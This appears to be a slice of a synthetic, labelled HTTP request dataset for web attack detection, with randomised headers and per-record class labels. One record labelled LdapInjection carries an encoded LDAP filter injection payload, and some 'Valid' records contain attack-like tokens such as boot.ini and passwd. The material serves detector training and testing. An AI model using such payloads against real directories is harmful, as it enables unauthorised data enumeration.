GET /xaxrmEn5nmssitte/seeoEoaydH/ir/hsoc/antM/uni53csSis0/toeSeF9ety/niea1dgtoy2n.php3?1rdthxeow=2545941&dt5r6R-7TbX=h8CA56fTvR_d&eo1e=w4_Qcctz&rDeba7lrc=7wsfi2Cmse%3AyE+7rlt+%7E&nztthga=hrfre%29%28+%7C%28n8o%3D*%29&9mreqUe=eoAEna8ayr8e&dnugetqqe4qu=+&2TnnLeueoo=825487&wekdo0iitLEpas=clbetween&snaiioraL=%29yi&tmpIW6nIwa=weinputu&l7cBpzwOeob=yo%26i&4wyth=to&@3rVPy.open=trjemoh6ees8sgAt&dz7edi7yfa=wIbuooe%409a HTTP/1.0
Host: www.isdtmgt6e.ch:80
Connection: keep-alive
Accept: text/*;q=0.6, audio/*;q=0.5
Accept-Charset: iso-8859-7, cp-932, us-ascii
Accept-Encoding: compress;q=0.9, compress
Accept-Language: l-tbdn, 7a-prxkmu5u;q=0.8, 0irNrdou-esmdatd;q=0.5
Cache-Control: no-store
Client-ip: 231.216.109.79
Cookie: otnsx=ee8el;39CpuL=ge  tst rsala
Cookie2: $Version="987"
Date: Thu, 07 Jun 07 19:40:35 UTC
ETag: "P0FYr3vOYR-9J60W8X"
Expect: UpT3s
From: snaN@sfjo15.ch
If-Modified-Since: Thu, 08 Sep 05 08:25:03 GMT
If-Unmodified-Since: Tue, 29 Apr 08 14:06:10 CET
If-Match: "Is7KVRJe1EvXAhlO4N"
If-None-Match: *
If-Range: Fri, 16 May 08 11:41:00 CET
Max-Forwards: 7861
MIME-Version: 6.9
Pragma: hmiuh6=2
Proxy-Authorization: Basic bGVhY286c3RvcnNz
Authorization: te0cr rhsa=daNhaixq
Range: -5
Referer: http://MvnEs.cz/umxyh9ni/mrfaoiQ/1bat32n/jhsev.swf
TE: trailers
Trailer: If-Range
User-Agent: ieaas (oHmV53h; 4gXLUvtVZ)
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 233x5921
Via: FTP/8.3 4.126.164.32, FTP/3.9 www.refwn.html, FTP/1.1 www.Twexr.gif
Transfer-Encoding: compress
Upgrade: ksu/7.2, ear/3.1
Warning: 149 www.memO4ih.js "gsEeeekriesa" "Mon, 30 Nov 09 07:31:03 GMT"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38573
Start - Id: 24080
class: Valid
GET /l600majA.lOOVZkJVKVj/eCiXWbDPhZtyrDv/obpsnea/Oabs/7zKV6joK6I9p/II/sBmRHs5dCJ8oSaFf/t1l.reZt5Lkz/lleKAF71r1PR5ITn.gif?lr5ucOeml=zEduc&slwaeenarzT=sVXe%40Jo&sbn0mNejt8h=oq+%3F%27libd%3Foevbscriptb%3E%40mo&Aztdweto=eiahome%3DTTd%3Cnwt4+eysmMa&ieeOadraaxbe4tE=tlOe&ti=eKH1dbgiY&c.UwVU=hitwlN%40psgm&echoKBCvVqwindow.openv=L+eUautoexecce%3AntioAp29%24&ktwonUvarahht=sopthyDheNn2trE6ol&rzleimafhhweotO=8&Na8tItlt=744&e7=eemxphdass&Ei6ie=awsG&ooEowsowec0we=RendoRd6itl+ho&eaesaew8ice=84 HTTP/1.1
Host: 107.215.200.15
Connection: r2Szdss
Accept: application/*, text/html, text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fbsIw-T9;q=0.8
Cache-Control: no-transform
Client-ip: 246.18.133.160
Cookie: nwlwtivowtrot=9331096932
Cookie2: $Version="56"
Date: Tue, 17 Oct 06 16:20:04 CET
ETag: W/"3RJM5DCUff-.9YZ2"
Expect: tlafwRq=toesrhEa
From: idehs@lb6ztam.biz
If-Modified-Since: Sat, 15 Nov 08 08:09:34 UTC
If-Unmodified-Since: Mon, 24 Nov 08 05:54:38 GMT
If-Match: "KaW0IWbF805mN8q"
If-None-Match: "KhY.OhiHRkl00dIdC"
If-Range: Sat, 12 May 07 20:12:10 GMT
Max-Forwards: 112
MIME-Version: 3.7
Pragma: o6=y
Proxy-Authorization: NTLM dWw5ZWJpbTJydHJ0dGZpSm9hdGFzdWtubW5JcU51ZWlidkptVXRkZ3V1Nk9pRQ==
Authorization: Digest response="dd803Ed3ACF4FDFAf84056dac7A41dDC"
Range: 90505-,-578979,95974-3
Referer: http://www.8eqtltus.de/anac.php4
TE: trailers,gzip;q=0.8,deflate;q=0.1
Trailer: Accept-Charset
User-Agent: aaoprTij (uxpkQEBfXL; ecN-KuytC; m1Efq5; rda8mix; sy7_wCZn)
UA-CPU: 68000
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: 5.8 www.ttuer4i.tiff
Transfer-Encoding: identity
Upgrade: se7/3.4, xaa/8.7, srlhe/8.3
Warning: 485 187.82.157.58:134 "tnesttoEh8tkj" 
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 0084225845225079837
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24080
Start - Id: 24016
class: Valid
GET /slL/itwZHuae.ffp1WCsANt/2taseehattneteepf/loo54anukpb8zhndao/znonT/imaoaiejue/cMFdz81Vp3T@dD5CxvL/iP_qwVab0.gif?weh1nlCOngu5I=ydn%27rh%27ieu&mdtar=lijTarsh%24ejnSmailrti&efrimalumlaSl=l+hr&Yu8GMMo12=sr%2FS&0ytrtcesaan7l=+I5h8ath+t%28%3CnEdshtaccesa&wyugaJgse8eRd=ntrdtsRoTejeaaEd&mqsX=nn5body HTTP/1.0
Host: 141.182.31.169
Connection: veufglt
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 172.138.38.160
Cookie: tna3mtabRt=92;yeuoeLetBddauo=47615;tifxp=2353204253;hi2dTodia=roo13hyrswaku;ytas6=nmh2ooa
Cookie2: $Version="723"
Date: Fri, 18 Apr 08 20:05:58 UTC
ETag: W/"qyf87y1wQPQqAXhGlEd"
Expect: 100-continue
From: 8ihnedd@EsreI51e7i.com
If-Modified-Since: Thu, 21 Dec 06 10:53:08 UTC
If-Unmodified-Since: Thu, 01 Sep 05 02:12:36 UTC
If-Match: "sPXk-YSWWA0sZBR.3aTx"
If-None-Match: "5BmYflWwLSqvHxEQq@B"
If-Range: Tue, 10 Jul 07 17:00:26 CET
Max-Forwards: 8
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM cmhlYWVtbHJobkV5ZGVvaGl0U2Nzd28yemVvbGFyZlRoZTdRaGxSYXg=
Authorization: ophtts etnz=4cyso
Range: -2,64-,35201-
Referer: http://vq1y.it/lvhinn/rTint.nsf
TE: trailers
Trailer: Date
User-Agent: Mozilla/3.4 (Windows; U; Win98 5.8; n8-we; rv:9.8.8) Gecko/77988235
UA-CPU: PowerPC
UA-Disp: 4414,5382,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 314x0873
Via: 1.7 www.smlZ.jpeg, 3.2 169.147.56.81, 9.0 22.5.83.215
Transfer-Encoding: gzip
Upgrade: h3rE/8.7, eogee/2.9, td0aa/8.5, toirs/3.2, Lme/4.0
Warning: 560 www.e6Dyu8.png "snbntciioi9G" "Wed, 08 Apr 09 10:48:35 GMT"
X-Forwarded-For: 160.213.124.93
X-Serial-Number: 54119
----: ----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 24016
Start - Id: 2547
class: Valid
GET /nttrgmlA2tariz/rhVa/i5o/eGvnRTX67rLk4lR/lttecsktsheMod5hAv/fQXf9dB.DO@A8ke/w-oy/ismeSwlpsOoen2tynr/neTEhngptdzc63ubk/wre/K7xw2dxp_eO_CD/ctstsaoe1f3.nsf? HTTP/1.1
Host: www.shhcqQqoe3.it
Connection: close
Accept: audio/*, audio/basic, video/*
Accept-Charset: utf-8;q=0.5, iso-2022-jp, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: gianhsco-yeSMUe, 6uhhq-auorea;q=0.3, hTsao-nl6Ekh, bi8d-dau2Kuqj;q=0.3
Cache-Control: 6=ysEi7Ll
Client-ip: 88.168.88.157
Cookie: tconxRrn=60739;ei2a=7
Cookie2: $Version="894"
Date: Wed, 22 Dec 04 06:23:20 GMT
ETag: "fwL.7xLPPALvdTUGNj"
Expect: 100-continue
From: ofHrc@8cET.be
If-Modified-Since: Sun, 26 Jul 09 13:06:58 UTC
If-Unmodified-Since: Sun, 25 Mar 07 11:29:46 CET
If-Match: "HQtgWu4kUBm4qVRCrvg"
If-None-Match: "r-ZWVe9vF0EUcX2g6"
If-Range: Fri, 29 Jun 07 05:02:24 CET
Max-Forwards: 699
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/tlsstete/Eaolaro/6wsnstto.shtml
Authorization: Basic YXJVdDpoaHdtaW51bA==
Range: 528055-4989,-6
Referer: /bettsve.mdb
TE: gzip;q=0.2,deflate;q=0.0
Trailer: If-Range
User-Agent: seefe (hJaneXbpQa; nrWINsN; e1y@UDFAU)
UA-CPU: MIPS
UA-Disp: 7814,3567,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 266x8527
Via: e7csfc/0.3 209.236.72.166:3, 4.7 www.biee.gif
Transfer-Encoding: gzip
Upgrade: ms8e/5.5, bc0udr/8.6
Warning: 953 www.h8zy.png "teAfk" "Tue, 09 May 06 12:50:35 CET"
X-Forwarded-For: 237.59.187.114
X-Serial-Number: 8053339262095703049
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2547
Start - Id: 15700
class: Valid
GET /7bo/rsrlnneeraoyaten/c8Btmoo4i.shtml?9H2window.openOprocessing-instructionboot.iniy=e3-2sock_streamFodG%26&openL4@Z=tZithbdi&R@12CvX=%40rnee%3A&eTritaxhs2sK=srRuryyGUo&Aewicnhbvsbfm=901&gqCN-7xml=nd9eetee&nTczyotdo=tiienhil+9nt&_MzD64@img9AU=wD+tclnsEeen%5Bymze HTTP/1.0
Host: 87.71.235.86
Connection: Ttobytt
Accept: audio/*
Accept-Charset: x-mac-icelandic;q=0.0, x-mac-arabic, iso-8859-9, iso-2022-jp, isiri-3342;q=0.4
Accept-Encoding: gzip;q=0.6
Accept-Language: iz-P;q=0.8, es-lI;q=0.9, eka-euoonx6A;q=0.7, ltid-gilun;q=0.1
Cache-Control: min-fresh=248
Client-ip: 165.238.234.97
Cookie: 2g=i;p0itscr=breti;lta0io=uPlz95h;eet=natrckTLnemu0;tifanmfiuf=1839
Cookie2: $Version="81"
Date: Fri, 17 Oct 08 17:33:02 GMT
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Sun, 25 Jan 09 17:20:48 CET
If-Unmodified-Since: Thu, 07 Apr 05 11:21:18 GMT
If-Match: "yTF9Mi3EyR6Qdx5LnWlQ"
If-None-Match: "UfAdEtto31ayJUFG"
If-Range: "oRSjlMzPJ0TL1ju@"
Max-Forwards: 712
MIME-Version: 2.3
Pragma: emyaoo=faEt
Proxy-Authorization: NTLM TndhbXRyemVrdG91ZWxlczlhZUFjdGFucm5ldHRvZXpJc2Rob3ZjaDJsaWNzemk0
Authorization: wipuA a3Tgeon=6ntigsn
Range: -2
Referer: /6lefeis/Sanr.jsp
TE: trailers,deflate,deflate;q=0.8
Trailer: Trailer
User-Agent: gp5wdYW7 http://www.7sueeato.ch
UA-CPU: StrongARM
UA-Disp: 9331,266,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8122x873
Via: aoo/6.5 51.90.180.166:2260
Transfer-Encoding: eHhtn; rhRRkpe=etna
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 451 194.177.41.7 "maNtqhbf" 
X-Forwarded-For: 23.70.171.229
X-Serial-Number: 9307845835407773
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15700
Start - Id: 21566
class: Valid
GET /owe/muijfDso8wfr/n9NfRhfz2WM6b4Xc1/hftan1hette/ton0dcTc4dplsNk/OPcIGknz6jopen/i@Q@/gEyHGtHIQlO6Jda/eKDhWAfzox3r93CrxW/28ndh/w7BO-0H.jpeg?lileeeucou=526564&CvxHnz9YZ=3186&nrwaeH=13&gumrh6eaeoab8na=45&oae=InaufoSAtfp%26e+o&hotczhe7tn=33&B28naoonnhrze=0zPRl HTTP/1.0
Host: 235.194.15.107
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4;q=0.9, windows-1255;q=0.3, iso-8859-7
Accept-Encoding: 
Accept-Language: aUsIe-otupvfa, zx-es1o, peeets-AtC
Cache-Control: max-stale
Client-ip: 113.45.187.36
Cookie: T57=439225;rlra=eOU.m79Ko;liutpos=~d qomt2input;x2u7vzbscohig=90683;imEi9hii=li76&mo
Cookie2: $Version="369"
Date: Thu, 17 Sep 09 02:21:55 GMT
ETag: W/"s@WI5ffCNTy5Y9K"
Expect: 100-continue
From: t1Gpd0t@aonx3yb.biz
If-Modified-Since: Sun, 04 May 08 21:05:34 CET
If-Unmodified-Since: Sun, 22 Apr 07 22:06:33 CET
If-Match: "O7fclXPvCsNF0E8hzb5X"
If-None-Match: "-rmZJYSjtejiiMrq2"
If-Range: Tue, 10 May 05 11:19:28 UTC
Max-Forwards: 39
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic b3VkOUU6VEVhcGNhcHM=
Authorization: Basic YXNlbmE6aWQ2dHI=
Range: 2-80,017649-3707,66648-326
Referer: http://www.ranreh.be/rmarreie/uwWalez/ttemT/17h3.mpg
TE: deflate,gzip,trailers
Trailer: If-Range
User-Agent: Mozilla/8.0 (Windows; U; Windows NT 3.1; 2o-fi; rv:2.4.2) Gecko/18088596
UA-CPU: x86
UA-Disp: 9153,8066,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0542x2765
Via: 3.7 www.s6yt.shtml, 0.4 215.192.211.21, 5.5 www.9umrf.jpeg
Transfer-Encoding: identity
Upgrade: rle/0.9, 32noar/1.9, terase/3.6, lop/4.7, lgd/8.7
Warning: 105 194.179.101.101:797 "yfe4eht3aAartosoia" "Tue, 19 Jul 05 17:23:33 GMT"
X-Forwarded-For: 40.222.86.185
X-Serial-Number: 42015
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21566
Start - Id: 28043
class: Valid
GET /nnhefei92h/ze/Q5VM_YYSv3Xgroup by.Vh/Einpdeisep/@ukwhtacces/gzSgQLA9cLc/8P/spq.REc/g8R-yl_Z/im.shtml?Uevzc=8254574&Ix6=9-sawon HTTP/1.1
Host: www.ouVn5youe.uk
Connection: ecoemope
Accept: */*
Accept-Charset: iso-8859-7;q=0.4, x-mac-greek, x-mac-ce, x-mac-greek
Accept-Encoding: deflate;q=0.2, compress;q=0.9, gzip;q=0.0
Accept-Language: *
Cache-Control: min-fresh=1733
Client-ip: 218.33.30.72
Cookie: hMfle=\nz;PUTVes6Qzprocessing-instruction7=olibaftpA7l@8n5h|p5p2e;6oemgtarRseiabs=4;qu3nsemD=3;adsntu=F@da(;3cyvf=node
Cookie2: $Version="13"
Date: Fri, 13 Jun 08 06:29:15 CET
ETag: "3xZsy_gN8luQ4zEWl_n."
Expect: 100-continue
From: gu9cDaia@ar6it9.st
If-Modified-Since: Sat, 04 Apr 09 24:37:24 GMT
If-Unmodified-Since: Fri, 26 Aug 05 16:41:35 GMT
If-Match: "7siXnYCiXm_6uRs8Hw"
If-None-Match: *
If-Range: Wed, 26 Sep 07 02:45:31 GMT
Max-Forwards: 2959
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic Yjllbndob2w6dHIxcmU=
Authorization: derg whotyhew=Hts8nhi
Range: -570
Referer: http://www.lozosNns.net/r0wwn.mspx
TE: trailers,gzip;q=0.3
Trailer: Range
User-Agent: Mozilla/9.8 (compatible; MSIE 9.8; Mac OS X; andbddunxv; 0ree52en)
UA-CPU: MIPS
UA-Disp: 352,634,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4477x7117
Via: FTP/0.0 www.7ida2sdt.png
Transfer-Encoding: compress
Upgrade: oe2lo1/5.5, meme/3.9, dxyas/2.0
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 769134
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28043
Start - Id: 25788
class: Valid
GET /n4yG1ryydWCNie/d2quL/gtwmctt/4OuIkuts3/r.1f/s4Fk/osmuvs/c5qMn/It7h5aerBmbj/cZ.bp_yUH8z-qSGh/Hasag8y0n.css?lir=386&trrhielrhisHet=lQY1zG92Yb1h&ymsti8kan6phst=ngt8&wojhjt=5705&rtriDms=lboi%3E HTTP/1.1
Host: 93.153.145.159
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: euc-cn;q=0.5
Accept-Encoding: compress;q=0.4, gzip, gzip;q=0.7
Accept-Language: subi-0li8o;q=0.5, pDevLdt-eh5;q=0.7
Cache-Control: min-fresh=680
Client-ip: 52.121.198.37
Cookie: U9QyLOT=r6nnhodyrbe6ddst;ewhaezhgeb=141;mGS0fketcDP=her2opT
Cookie2: $Version="08"
Date: Thu, 19 Jan 06 24:48:08 GMT
ETag: "bqHkQToYI1p6oJhaW8g"
Expect: 100-continue
From: wcr0oelc@nhee9nt.fr
If-Modified-Since: Thu, 07 Jul 05 22:59:32 UTC
If-Unmodified-Since: Sun, 27 Dec 09 08:59:45 GMT
If-Match: "n4G@Bwkce1YRuq@LK"
If-None-Match: *
If-Range: Sun, 19 Nov 06 20:20:09 UTC
Max-Forwards: 6
MIME-Version: 0.6
Pragma: aa=rea0oIg
Proxy-Authorization: NTLM bWxvaGhtdEhmdDB3amhtZXdOc3lHbmpubmd0NGJjVDhhVHM3czRzbDAyWG0=
Authorization: thwtg3 qeO6repi=mz8neu
Range: 644-,-02
Referer: http://i6re.gov/5pRyey/rbclbtgi/leb9.rar
TE: chunked,trailers
Trailer: Warning
User-Agent: Mozilla/2.9 (X11; U; SunOS sun4u 5.6; ia-uh; rv:0.6.5) Gecko/03115759
UA-CPU: Sparc
UA-Disp: 9911,6209,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 291x574
Via: 1.4 www.vDulsafb.shtml
Transfer-Encoding: compress
Upgrade: wga/3.1, Wienee/8.7, tle/0.5, sc5O3p/8.0, atnnea/5.9
Warning: 825 0.153.179.180:61 "TfhhisrhLuspeaNcn" "Fri, 29 May 09 09:24:00 GMT"
X-Forwarded-For: 177.217.88.163
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25788
Start - Id: 38086
class: LdapInjection
GET /ZlqliKR/m-6wyW9vYy@_Iaq5Ci/kr/B1/hkm94u-tKu.css?oi7f=%29+%28+%7C++++%28displayName%3Dhad*%29++%28name+%3D++++had*+++%29%28mail%3Dhad*++%29 HTTP/1.0
Host: www.ninanOo6.biz
Connection: tdzuwfsm
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: cGrl3tes=msselas
Client-ip: 111.152.191.252
Cookie: ajaie8didflf0tl=Tev5e;dow=KsO;8ggnet1Dcnecfc=36457335
Cookie2: $Version="74"
Date: Mon, 07 Aug 06 18:26:43 GMT
ETag: W/"WFlRn2_F0qiz2qXuNMV"
Expect: 100-continue
From: 7ptrd@s3eas2sne.fr
If-Modified-Since: Mon, 10 Dec 07 24:12:55 UTC
If-Unmodified-Since: Sat, 05 Jun 04 20:20:03 UTC
If-Match: *
If-None-Match: "NtTBkiQr7.qr_qJGPp"
If-Range: *
Max-Forwards: 26
MIME-Version: 7.3
Pragma: Uj=qpsp
Proxy-Authorization: Basic V3I2dGV5dzppZXR0ZW5pYw==
Authorization: Digest algorithm=MD5-sess
Range: 77-,76-
Referer: /dhdia/a8i79/ruan4oh/maenNhf/ghba4.png
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/7.0 (Windows; U; Win 9x 7.7; Ht-7g; rv:0.5.5) Gecko/03023232
UA-CPU: MIPS
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: FTP/2.9 www.eeFdoet.js:021, aWnpa/0.5 www.hmoU0.js, 8.5 61.28.97.229
Transfer-Encoding: 4nis; ohirt=itsrh2
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 152.42.151.28
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38086
Start - Id: 25263
class: Valid
GET /Tosbs0nCatrin/ieweji8yro.gif? HTTP/1.0
Host: 254.185.247.212:80
Connection: ssdh
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=00971
Client-ip: 142.23.146.55
Cookie: lllr=~Ete3rbhometizot;886lLtaerninoE=tay.CaFRg;hr2tc3tcNnrenn=254489;tegzehx=886;oM6uiJoost=3966
Cookie2: $Version="516"
Date: Wed, 10 Dec 08 18:38:00 UTC
ETag: W/"an6QYv7yVXxx@gHYz"
Expect: 100-continue
From: e8ue@ouofs.gov
If-Modified-Since: Mon, 30 Jul 07 23:46:07 GMT
If-Unmodified-Since: Thu, 13 Jan 05 11:32:54 CET
If-Match: "_8@4Eg36ZEsXTrC_v8mk"
If-None-Match: "j@N1YrEcmO-mg_ZJ0LI"
If-Range: Thu, 16 Feb 06 05:21:46 GMT
Max-Forwards: 3891
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: 7ddr oinerrtu=Stpan
Authorization: bhm13 xeeiaj=taci0arn
Range: 7-54,1-07056,-1403
Referer: http://www.eryi.de/6gnni/qros/dmbP9i/afzeti/utyclaaw.wmn
TE: chunked,deflate;q=0.3
Trailer: Trailer
User-Agent: Mozilla/7.2 (X11; U; Linux i586 9.5; oz-gr; rv:0.6.7) Gecko/72540240
UA-CPU: x86
UA-Disp: 8204,1865,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4028x8502
Via: h6s/0.9 18.80.62.142, 4.8 www.sak7tnk.png, 3.1 www.aiAcni.html
Transfer-Encoding: deflate
Upgrade: smn6/9.9, tqura/5.8, omdo/1.2, eil2/4.6
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25263
Start - Id: 22208
class: Valid
GET /_ftpreplaceQ2divaB4POU0ZJ.nsf?sbMTF8.=kVH7&HBr=oi%3Anq&teneoracoimodf=6aaaj80e&ln2seefOlrtmit=tk%3Ae%7Cc5laccess_logee&uhgdhrh99ep=te9dttlizartiuEoi&ni=ae82n7&QSolIguz=%40ipasswd HTTP/1.1
Host: www.ltgcoe.ch:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-15, windows-874;q=0.2, iso-8859-9, macintosh, iso-8859-1;q=0.2
Accept-Encoding: 
Accept-Language: a-znieiteu;q=0.9, f3dt-oeeenn;q=0.3
Cache-Control: no-store
Client-ip: 85.39.192.131
Cookie: obH9ihomeP=98;.fOYallC1lsJ=iiormo;o1=625407255
Cookie2: $Version="1"
Date: Tue, 27 Sep 05 01:20:51 UTC
ETag: "8lIP4UFX.Gq_zdTG"
Expect: 100-continue
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Mon, 21 Jun 04 10:06:49 UTC
If-Unmodified-Since: Sat, 27 Jun 09 21:31:39 GMT
If-Match: "UVl.G0aeTYEsYPOD6Xjw"
If-None-Match: "QK@vS5pEyaSj4p1"
If-Range: Sat, 28 Feb 04 08:50:43 CET
Max-Forwards: 498
MIME-Version: 6.8
Pragma: aoaoatej=ir
Proxy-Authorization: Basic bGNoYW46bzRPYUM=
Authorization: Basic bXJqdnRTMGQ6Y1RpenNl
Range: -09
Referer: /cedaevj/knnnmido/aaaiehb/eeeme/Eglevntp.mpg
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.2 (X11; U; Linux i586 7.2; l3-eU; rv:5.9.2) Gecko/42237376
UA-CPU: Sparc
UA-Disp: 425,349,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x8565
Via: 9.9 121.151.79.42
Transfer-Encoding: gzip
Upgrade: tmok/9.0, unq6a/6.8, to6le/2.7
Warning: 872 www.bdtysim.jpg "nttre4ts" 
X-Forwarded-For: 11.11.146.50
X-Serial-Number: 29292278992836758450
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22208
Start - Id: 33564
class: Valid
POST /rlurrlpsnperctuieue/ulfda3/lWNjMrLr5SJL.c/1yunrre2nt/mmherkmiiiaedtif71t/swetpfdd1ol/tIv5oVs6D6b/tnmtIsaetusc7/re5enlue1Shcan/HAmb.df/home345/aJEuat.css? HTTP/1.1
Content-Length: 99
Content-Language: lftssnw,ulsde,ml
Content-Encoding: identity
Content-Location: http://xpfTe93r.biz/kA2as9er/gt4he.css
Content-MD5: bmluc2NlaW50YXJtaGlpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Oct 09 21:55:19 GMT
Last-Modified: Wed, 02 Aug 06 17:13:55 GMT
Host: www.tadeyqeehv.be
Connection: etinwua
Accept: */*;q=0.0
Accept-Charset: euc-tw;q=0.0, isiri-3342, iso-8859-9, koi8;q=0.8, iso-10646-ucs-2;q=0.6
Accept-Encoding: *
Accept-Language: aw-rnrg;q=0.9, alltleu-i;q=0.4, eekr-amdoUlBE, 5-oHqfbSy
Cache-Control: no-transform
Client-ip: 120.138.44.232
Cookie: Liwteoto5ilhrmt=uivhndeze;irrnieiidd=Ote r;a2oi03=jait;x6btD81G8MX=lastyle3xterm-urn?eme6a
Cookie2: $Version="77"
Date: Wed, 11 Oct 06 01:52:21 CET
ETag: W/"bQg_RxXXi8-QslJF"
Expect: 100-continue
From: nndz@n7ls.fr
If-Modified-Since: Wed, 24 Jun 09 16:10:00 UTC
If-Unmodified-Since: Tue, 05 Oct 04 06:42:49 GMT
If-Match: "_yX-26cT-0X_@4EBLB"
If-None-Match: "pM3sxduh2Zzuh_cCl6"
If-Range: Tue, 06 May 08 05:06:33 CET
Max-Forwards: 9
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM aXJlbHBlNHRsazdsbGZpbmh0cmVpZXNzdXlnbGVrN2lpbjZuc2ZlMW90ZXJy
Authorization: Basic empydGE6VG9jYWFYb3U=
Range: -842
Referer: /leoaccLj/nVrnvore/eAnbc/t8iSnw3/zogTneh.bin
TE: chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 5.3; ei-aa; rv:9.2.3) Gecko/95840883
UA-CPU: PowerPC
UA-Disp: 4987,665,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 417x756
Via: 2.7 www.cesd.gif, 7.3 www.adtOtxc.jpg, 8.7 www.eete.gif
Transfer-Encoding: gzip
Upgrade: mfbtIA/2.9, ou7og/9.7, ous/6.4, laf2aw/8.5
Warning: 904 254.251.47.53 "9tyslbOtj" "Fri, 25 Nov 05 09:55:02 UTC"
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 634432406284219
----: -----------------
~~~~~: ~~~~~~~~~~~

I4ralQBtX= form;nps insertt<varsd'dDg&rlkramri7ons=4651&fk8rfaiei=i&RmT2blk-C3Xu=7&svAHj0=Abc

End - Id: 33564
Start - Id: 72
class: Valid
GET /6echo40Hdiv5W@6home.nsf? HTTP/1.0
Host: www.rdjeiotd.org:7682
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic, iso-8859-3, hz-gb-2312;q=0.6
Accept-Encoding: 
Accept-Language: dfEaH-ti5;q=0.6, p-sOldcEe
Cache-Control: max-age=72384
Client-ip: 2.252.143.150
Cookie: Or6oaae7aizea5=84151314
Cookie2: $Version="646"
Date: Sat, 29 Oct 05 17:18:55 CET
ETag: W/"8WaPHksYP7X6FJt_"
Expect: 100-continue
From: hhfiYtat@W0diMywt.it
If-Modified-Since: Fri, 05 Feb 10 03:15:09 UTC
If-Unmodified-Since: Tue, 27 Jan 04 12:30:16 CET
If-Match: *
If-None-Match: "aYaoVac9tiu6nZ4"
If-Range: Thu, 18 Sep 08 23:22:46 CET
Max-Forwards: 0424
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: pVlh asmms=iwoa
Authorization: NTLM bHNhYXRpczhwaGVsYWV4aXlqdG1lbnRvdThlbUVpb3Nvc2VzbHBicnJsaGU=
Range: 1364-
Referer: /9lNhDsed/xtrbzi/hrtr/e8ft.wav
TE: deflate;q=0.6,deflate,trailers
Trailer: Date
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 9.5; ls-de; rv:8.4.6) Gecko/85924749
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5749x1102
Via: 4.8 www.wesaw.htm
